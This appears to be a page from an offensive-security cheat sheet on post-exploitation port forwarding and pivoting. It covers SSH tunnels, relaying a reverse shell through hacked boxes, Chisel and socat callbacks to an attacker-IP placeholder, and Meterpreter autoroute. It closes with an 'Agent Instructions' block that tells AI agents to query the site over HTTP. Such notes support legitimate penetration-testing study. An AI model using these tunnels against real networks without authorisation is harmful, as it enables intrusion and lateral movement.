# Port Forwarding ## SSH ### Locally Example: we want to connect to the port 1025 on the remote machine "delivery" on our port 1337. ``` ssh -L 1337:localhost:1025 maildeliverer@delivery ``` Example: we want to access the port 1025 on the remote machine "pivotable" through the machine "delivery" on our machine on port 1337. ``` ssh -L 1337:pivotable:1025 maildeliverer@delivery ``` ### Remotely Example: SSH to my kali, opens up port 1025 on the victim's localhost, to be accessible at port 1337 on kali. ``` ssh -R 1337:localhost:1025 kali@mykali ``` ### Dynamically This creates a SOCKS proxy that allows you to reach IP addresses that are in the same network as a box you can SSH to. Run the following commands on your machine to create a SOCKS proxy: ``` ssh -D 1080 username@box -N ``` Then, on your machine, make sure `/etc/proxychains.conf` has: ``` socks5 127.0.0.1 1080 ``` Then you can use the `proxychains` command in front of your other commands to proxy through the machine. For example, this command curls the IP address 192.168.122.4 through the proxied machine: ``` proxychains4 curl 192.168.122.4 ``` To use that with burp, go to "User Options", select "use socks proxy", and configure it to go through localhost on port 1080. *Note: SOCKS proxies proxy TCP traffic (and UDP with SOCKS5), but not ICMP, for example. So you can't ping through a proxy!* *Note: Firefox and Chromium didn't seem to work with proxychains. It might be possible to specify a SOCKS proxy in the browser settings, though.* ### Two Hops This section explains how to forward a reverse shell gained in a second hacked box through a first hacked box to kali. Run the following commands on the first hacked machine: ``` # in an ssh session: ~C # first part is for the hacked machine # second part is for kali -R 127.0.0.1:9001:127.0.0.1:9001 ``` **Question:** Why can't we just specify the private IP address in the above command instead of 127.0.0.1? In that case, we wouldn't have to redirect with socat later on. You can confirm whether it worked by running: ``` netstat -alnp | grep 9001 ``` This will send everything from the hacked machine's localhost:9001 to kali:9001. However, **it will not send anything from the hacked machine's private IP address** to kali. You can use socat to redirect traffic from the second hacked machine's private IP address to its localhost, so that the traffic could be forwarded to kali. In this example, the first hacked box's IP address is 192.168.122.1: ``` socat TCP-LISTEN:9001,bind=192.168.122.1,fork,reuseaddr TCP:localhost:9001 & ``` After you have set that up, you can run a reverse shell on the second hacked machine and have it connect to port 9001 on the first hacked machine. That connection will be forwarded to port 9001 on your kali. **Don't forget to run a listener on port 9001** in kali to catch the connection. ## Chisel This will allow you to access port 4505 on the target's localhost from port 4505 on your own machine. ``` # Run on kali ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse # Run on target machine ./chisel_1.7.6_linux_amd64 client YOUR_IP_ADDRESS:12312 R:4505:127.0.0.1:4505 ``` ## Socat ### Same Machine Redirection You can use socat for redirecting a port to another port on the same machine. For example, this command redirects port 9001 on the IP address 192.168.122.1 to localhost:9001 **on that same machine**: ``` socat TCP-LISTEN:9001,bind=192.168.122.1,fork,reuseaddr TCP:localhost:9001 & ``` ### **Access Remote Port Through Local Port** {% embed url="" %} **Warning**: For some strange reason, when I used this to forward a web port, then I was able to do curl requests to this, but not gobuster or wfuzz. ``` # On attacker's machine # Redirect port 2222 to port 443 in localhost sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr # On victim machine # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22 while true; do socat TCP4:ATTACKER_IP_ADDRESS_HERE:443 TCP4:127.0.0.1:22 ; done ``` After following the above example, your port 2222 will be forwarded to a victim's port 22. So you can SSH to the victim like this: ``` ssh localhost -p 2222 ``` ## Meterpreter Autorouting {% embed url="" %} Autoroute documentation {% endembed %} Use autoroute to automatically route traffic to a specific host Set up a socks proxy ``` use auxiliary/server/socks_proxy run ``` Then set up proxychains by editing `/etc/proxychains.conf`. Add the socks5 proxy line under `[ProxyList]`(if there is already a ProxyList, add the line under the existing ProxyList): ``` [ProxyList] socks5 127.0.0.1 1080 ``` In metasploit, set up autorouting ``` use multi/manage/autoroute set cmd autoadd set session SESSION_NUMBER_HERE # Has to be meterpreter I think set subnet NETWORK_IP_ADDRESS_HERE set netmask NETMASK_HERE run ``` After that is done, you can run metasploit tools against the selected host. For example, `scanner/portscan/tcp` (the socks proxy part wasn't actually needed for this). But you want to reach the host using non-metasploit tools, too. To run nmap and other tools against hosts in the chosen subnet, use proxychains. For example, let's say you chose the subnet 172.17.0.0, and you want to scan the host at 172.17.0.1: ``` proxychains -q nmap -A -v 172.17.0.1 ``` **Warning: I didn't actually get the proxychains part to work on the OpenSource HTB machine, unfortunately.** ## Meterpreter Port Forwarding Portfwd is a command you can use for port forwarding on meterpreter {% embed url="" %} Portfwd section of metasploit docs {% endembed %} From meterpreter shell: ``` portfwd add -l 3000 -p 3000 -r 172.0.0.1 ``` * `-l`: local port to listen on * `-p`: remote port to connect to * `-r`: remote IP address to connect to ## Pivoting Cheat Sheet In-depth guide on different scenarios (ssh, reverse, tunnelling, etc):
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://heinosass.gitbook.io/leet-sheet/post-exploitation/linux/port-forwarding.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.